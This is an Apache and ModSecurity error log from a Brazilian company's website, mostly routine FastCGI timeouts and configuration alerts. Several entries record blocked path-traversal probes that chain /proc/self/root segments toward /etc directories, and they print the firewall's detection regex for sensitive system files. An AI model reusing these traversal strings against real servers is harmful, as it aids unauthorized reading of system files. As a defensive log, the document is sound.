[Thu Mar 19 09:17:33.051839 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:53130] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvpXda6ubjKNq_cu4ZDLQAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 09:17:45.213865 2026] [:error] [pid 27293:tid 140411691570944] [client 74.7.228.61:53536] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvpaf-YZRR_7pZ7nDKA3gAAA8Y"]
[Thu Mar 19 09:17:54.137819 2026] [proxy_fcgi:error] [pid 14269:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:57408] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:18:17.121774 2026] [proxy_fcgi:error] [pid 15826:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:57952] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:18:19.698004 2026] [mime_magic:error] [pid 26799:tid 140411548894976] (70014)End of file found: [client 57.141.18.86:59200] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 09:18:42.058383 2026] [proxy_fcgi:error] [pid 30077:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:58510] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:19:04.129803 2026] [proxy_fcgi:error] [pid 19093:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:59060] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:19:27.077831 2026] [proxy_fcgi:error] [pid 14269:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:59538] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:19:35.369183 2026] [mime_magic:error] [pid 14269:tid 140411691570944] (70014)End of file found: [client 74.7.241.31:33132] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/lib/systemd/user
[Thu Mar 19 09:19:51.122018 2026] [proxy_fcgi:error] [pid 27403:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:60036] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:20:02.805550 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.244.43:54264] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvp8uyqAr6etmhZHNpWEwAAAEI"]
[Thu Mar 19 09:20:15.085842 2026] [proxy_fcgi:error] [pid 17887:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:60486] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:20:31.545134 2026] [mime_magic:error] [pid 31803:tid 140411716749056] (70014)End of file found: [client 57.141.18.49:33686] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 09:20:39.129790 2026] [proxy_fcgi:error] [pid 31803:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:60968] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:20:57.342672 2026] [mime_magic:error] [pid 26799:tid 140411548894976] (70014)End of file found: [client 57.141.18.118:34750] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 09:21:03.165796 2026] [proxy_fcgi:error] [pid 17887:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:33200] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:21:13.898565 2026] [mime_magic:error] [pid 26799:tid 140411733534464] (70014)End of file found: [client 57.141.18.11:35094] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 09:21:19.497312 2026] [core:alert] [pid 26799:tid 140411725141760] [client 57.141.18.71:35112] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 09:21:30.133768 2026] [proxy_fcgi:error] [pid 31803:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:33862] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:21:30.349688 2026] [mime_magic:error] [pid 27293:tid 140411649607424] (70014)End of file found: [client 57.141.18.82:35412] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 09:22:00.125047 2026] [proxy_fcgi:error] [pid 31803:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:34522] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:22:00.965043 2026] [:error] [pid 19093:tid 140411658000128] [client 74.7.243.128:39242] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvqaF_V7PWP6ixUYl6xmwAAAoo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 09:22:24.668256 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.243.128:33760] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvqgOoXxyEfFpUF8f8DpAAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 09:22:30.045827 2026] [proxy_fcgi:error] [pid 31803:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:35148] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:22:33.223182 2026] [mime_magic:error] [pid 30077:tid 140411599251200] (70014)End of file found: [client 57.141.18.23:36690] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 09:22:51.133891 2026] [proxy_fcgi:error] [pid 26799:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:35520] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:23:06.780808 2026] [mime_magic:error] [pid 15826:tid 140411641214720] (70014)End of file found: [client 57.141.18.53:37366] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 09:23:16.114688 2026] [proxy_fcgi:error] [pid 31803:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:36072] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:23:45.127764 2026] [proxy_fcgi:error] [pid 31803:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:36708] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:24:11.121778 2026] [proxy_fcgi:error] [pid 31803:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:37460] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:24:34.119154 2026] [proxy_fcgi:error] [pid 27293:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:38006] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:24:52.377803 2026] [core:alert] [pid 30077:tid 140411557287680] [client 57.141.18.102:39254] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 09:24:58.121805 2026] [proxy_fcgi:error] [pid 31803:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:38494] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:25:21.105823 2026] [proxy_fcgi:error] [pid 19093:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:38878] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:25:46.053871 2026] [proxy_fcgi:error] [pid 26799:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:39392] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:26:08.057830 2026] [proxy_fcgi:error] [pid 19093:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:39828] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:26:31.146792 2026] [proxy_fcgi:error] [pid 19093:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:40286] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:26:56.133778 2026] [proxy_fcgi:error] [pid 17887:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:40826] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:27:05.751546 2026] [mime_magic:error] [pid 14269:tid 140411658000128] (70014)End of file found: [client 74.7.243.128:53668] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/lib/firmware
[Thu Mar 19 09:27:22.137802 2026] [proxy_fcgi:error] [pid 17887:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:41418] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:27:46.131721 2026] [proxy_fcgi:error] [pid 27403:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:41868] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:27:50.039549 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.228.61:57238] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvrxgkwaGbbGflqUZCz7wAAAM4"]
[Thu Mar 19 09:27:57.333891 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:46842] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvrzda6ubjKNq_cu4ZElQAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 09:28:14.133800 2026] [proxy_fcgi:error] [pid 27293:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:42376] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:28:14.921699 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.243.128:49404] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvr3gkwaGbbGflqUZCz-QAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 09:28:20.243734 2026] [core:alert] [pid 19093:tid 140411624429312] [client 74.7.241.31:36078] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?fileloc=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib/systemd/user/glib-pacrunner.service&path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/lib/systemd/user
[Thu Mar 19 09:28:28.687844 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.243.128:51516] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvr7Pu8EFLIOrSqIpuaDwAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 09:28:42.045908 2026] [proxy_fcgi:error] [pid 26799:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:43034] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:29:10.057898 2026] [proxy_fcgi:error] [pid 27403:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:43682] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:29:34.137780 2026] [proxy_fcgi:error] [pid 17653:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:44238] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:29:54.177930 2026] [core:alert] [pid 17653:tid 140411548894976] [client 57.141.18.55:46416] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 09:30:00.097822 2026] [proxy_fcgi:error] [pid 26799:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:44792] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:30:28.115656 2026] [proxy_fcgi:error] [pid 19093:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:45340] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:30:54.990726 2026] [proxy_fcgi:error] [pid 26799:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:45906] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:31:16.129813 2026] [proxy_fcgi:error] [pid 27403:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:46406] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:31:39.133796 2026] [proxy_fcgi:error] [pid 27403:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:46894] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:31:58.289890 2026] [mime_magic:error] [pid 15826:tid 140411565680384] (70014)End of file found: [client 57.141.18.26:49298] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 09:32:07.110111 2026] [proxy_fcgi:error] [pid 30077:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:47568] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:32:30.137771 2026] [proxy_fcgi:error] [pid 15826:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:48128] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:32:52.385818 2026] [proxy_fcgi:error] [pid 14269:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:48576] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:33:15.145854 2026] [proxy_fcgi:error] [pid 17653:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:49076] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:33:17.824451 2026] [core:alert] [pid 27403:tid 140411557287680] [client 57.141.18.95:51060] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 09:33:31.535880 2026] [:error] [pid 14269:tid 140411574073088] [client 74.7.243.128:38942] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvtGwbLMZ6AikZjR9VURgAAABQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 09:33:39.153779 2026] [proxy_fcgi:error] [pid 19093:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:49560] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:33:59.653016 2026] [core:alert] [pid 26799:tid 140411574073088] [client 57.141.18.31:51494] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 09:34:06.133774 2026] [proxy_fcgi:error] [pid 19093:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:50160] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:34:20.440362 2026] [mime_magic:error] [pid 30077:tid 140411565680384] (70014)End of file found: [client 57.141.18.34:52372] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 09:34:31.121784 2026] [proxy_fcgi:error] [pid 15826:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:50718] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:34:39.325809 2026] [mime_magic:error] [pid 26799:tid 140411582465792] (70014)End of file found: [client 57.141.18.55:52356] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 09:34:58.125793 2026] [proxy_fcgi:error] [pid 17653:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:51348] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:35:11.099309 2026] [mime_magic:error] [pid 17887:tid 140411624429312] (70014)End of file found: [client 57.141.18.50:53226] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 09:35:14.079827 2026] [:error] [pid 27293:tid 140411658000128] [client 74.7.244.43:42052] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvtgv-YZRR_7pZ7nDKCsAAAA8o"]
[Thu Mar 19 09:35:19.023924 2026] [core:alert] [pid 27293:tid 140411733534464] [client 57.141.18.15:53130] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 09:35:21.956784 2026] [:error] [pid 14269:tid 140411540502272] [client 74.7.243.128:38942] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvtiQbLMZ6AikZjR9VUgAAAABg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 09:35:30.467702 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:59968] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvtkta6ubjKNq_cu4ZFrAAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 09:35:33.085896 2026] [proxy_fcgi:error] [pid 15826:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:52092] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:36:02.144244 2026] [proxy_fcgi:error] [pid 27293:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:52838] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:36:24.122724 2026] [proxy_fcgi:error] [pid 27403:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:53360] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:36:47.125820 2026] [proxy_fcgi:error] [pid 19093:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:53890] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:37:11.665781 2026] [proxy_fcgi:error] [pid 27293:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:54400] AH01075: Error dispatching request to : (polling)
